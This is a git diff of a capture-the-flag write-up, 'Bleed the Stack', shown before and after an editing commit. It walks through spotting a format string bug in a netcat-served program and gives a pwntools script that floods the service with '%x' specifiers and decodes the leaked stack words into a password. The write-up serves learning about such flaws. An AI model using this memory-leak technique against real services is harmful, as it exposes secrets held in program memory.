src/docs/writeups/bleed_the_stack.md, before:

---
title: "Bleed the Stack"
description: "An amateur programmer decides that for his hello world program, he will echo whatever you say. Can you find his mistake?"
author: "0x0539"
date: "2023-05-16"
published: true
---

# bleed the stack

([challenge page](https://0x0539.net/play/fangorn/bleedthestack))

```
pls@RUBY ~ > nc challenges.0x0539.net 7070
ADVANCED CHALLENGE :: BLEED THE STACK
*****************************

Test me! Enter your name and I'll print it back to you!
```

i started off by sending `%x` as a test, which immediately leaked hex values, so the program is likely vulnerable to a [format string attack](https://owasp.org/www-community/attacks/Format_string_attack):

```
Test me! Enter your name and I'll print it back to you!
%x %x %x %x %x %x %x %x
40 f7f77620 1 0 1 20656854 73736170 64726f77
```

converting those hexadecimal values to ascii, we get the string `@÷÷v [f7f77620] ehTssapdrow` (`[f7f77620]` is invalid ascii). notably, `ehTssapdrow` is little-endian ordering of the ascii string `The password`.
we can build a python program with pwntools to send a tonne of '%x' strings, pad out bytearrays with fewer than 4 bytes, and finally flip each dword. noting that some bytearrays dont appear to have a valid ascii representation, such as `f7f77620`, we can handle any errors by just setting the .

```python
from pwn import *

context.log_level = 'CRITICAL'
host,port = 'challenges.0x0539.net', 7070
format_str = '%x ' * 299

def decode_bytes(dword):
    try:
        decoded = bytes.fromhex(dword).decode('ascii')[::-1] # convert LE to BE
        return ''.join([ch for ch in decoded if 32 <= ord(ch) <= 126])
    except UnicodeDecodeError: # dont bother converting if invalid ascii
        print(f'UnicodeDecodeError on bytearray \\'{dword}\\'.\\n')
        return(f' {dword} ')

def main():
    s = remote(host,port)
    s.recvuntil(b'you!\\n')
    s.sendline(format_str)

    raw_bytes = s.recvall().decode().strip()
    print(f'\\nbytearray:\\n{raw_bytes}\\n')
    dwords = raw_bytes.split(' ')
    dwords = [dword.zfill(8) for dword in dwords] # pad out values lower than 4 bytes
    decoded_dwords = ''.join([decode_bytes(dword) for dword in dwords])
    print(f'leaked:\\n{decoded_dwords}') # print result.
    return('quitting')

main()
```

so our output from this program gives the following LE bytearray:

```bytearray
40 f7f20620 1 0 1 20656854 73736170 64726f77 3a736920 6c5f4920 5f337630 6d723066 625f7434 733675 25207825 78252078 20782520 25207825 78252078 20782520 25207825
```

which the python script will convert to ascii:

```bash
@ f7f20620 The password is: [[redacted]] %x %x %x %x %x %x %x %x %x %
```

Commit message:

more formatting fixes 	modified:   .gitignore 	modified:   mdsvex.config.js 	modified:   package-lock.json 	modified:   package.json 	modified:   src/docs/writeups/bleed_the_stack.md 	modified:   src/docs/writeups/confusing_passwords.md 	modified:   src/docs/writeups/cozyhosting.md 	modified:   src/docs/writeups/mr_robot.md 	modified:   src/docs/writeups/operation_eradication.md 	modified:   src/docs/writeups/rock_paper_psychic.md 	modified:   src/docs/writeups/speakfriend.md 	modified:   src/docs/writeups/tragedy_redux.md 	modified:   src/routes/+page.svelte 	modified:   src/routes/about/+page.svelte 	modified:   src/routes/writeups/+page.server.ts 	modified:   src/routes/writeups/[slug]/+page.svelte 	modified:   src/routes/writeups/[slug]/+page.ts 	modified:   static/styles/prism-catppuccin.css 	modified:   tailwind.config.js

src/docs/writeups/bleed_the_stack.md, after:

---
title: "Bleed the Stack"
description: "An amateur programmer decides that for his hello world program, he will echo whatever you say. Can you find his mistake?"
author: "0x0539"
date: "2023-05-16"
published: true
tags: ["capture the flag", "0x0539", "binex"]
---

# bleed the stack

([challenge page available @ 0x0539.net](https://0x0539.net/play/fangorn/bleedthestack))

```
pls@RUBY ~ > nc challenges.0x0539.net 7070
ADVANCED CHALLENGE :: BLEED THE STACK
*****************************

Test me! Enter your name and I'll print it back to you!
```

This challenge is based around a command-line program served over `netcat`. Given the challenge's name, our flag is probably hidden in this program's call stack, so I start off by sending `%x`, or a hexadecimal format string specifier.
This returned hex values, which means the program is likely vulnerable to a [format string attack](https://owasp.org/www-community/attacks/Format_string_attack):

```
Test me! Enter your name and I'll print it back to you!
%x %x %x %x %x %x %x %x
40 f7f77620 1 0 1 20656854 73736170 64726f77
```

To confirm this, we can convert the hexadecimal values to ASCII, yielding the (malformed) string `@÷÷v [f7f77620] ehTssapdrow` (noting that `[f7f77620]` is invalid as ASCII; the information here is intended to be read by a CPU and so is not necessarily human-readable text).

The string `ehTssapdrow` stands out as some form of actual text - it's 'little-endian' ordering of the ascii string `The password`.

We can automate an exploit with the `pwntools` python module:
- open a connection to the `netcat` server,
- send loads of '%x' format specifiers when prompted for input,
- and finally parse and decode the response.

Noting that some bytearrays dont appear to have a valid ascii representation (such as the aformentioned `f7f77620`), we can handle any errors by just ignoring these as unnecessary.

```python
from pwn import *

context.log_level = 'CRITICAL'
host,port = 'challenges.0x0539.net', 7070
format_str = '%x ' * 299

def decode_bytes(dword):
    # change endianness to BE & decode
    try:
        decoded = bytes.fromhex(dword).decode('ascii')[::-1]
        return ''.join([ch for ch in decoded if 32 <= ord(ch) <= 126])
    # return unchanged array if it can't be decoded
    except UnicodeDecodeError:
        print(f'UnicodeDecodeError on bytearray \\'{dword}\\'.\\n')
        return(f' {dword} ')

def main():
    s = remote(host,port)
    s.recvuntil(b'you!\\n')
    s.sendline(format_str)
    raw_bytes = s.recvall().decode().strip()

    # print the values leaked from the call stack to stdout
    print(f'\\nbytearray:\\n{raw_bytes}\\n')
    dwords = raw_bytes.split(' ')

    # ensure each array is 4 bytes long
    dwords = [dword.zfill(8) for dword in dwords]
    decoded_dwords = ''.join([decode_bytes(dword) for dword in dwords])

    # print the decoded values
    print(f'leaked:\\n{decoded_dwords}')

main()
```

The initial leaked output from this program's call stack gives us the following raw hex:

```bytearray
40 f7f20620 1 0 1 20656854 73736170 64726f77 3a736920 6c5f4920 5f337630 6d723066 625f7434 733675 25207825 78252078 20782520 25207825 78252078 20782520 25207825
```

Which our script will parse, decoding ASCII strings from their hexadecimal values:

```bash
@ f7f20620 The password is: [flag redacted] %x %x %x %x %x %x %x %x %x %
```
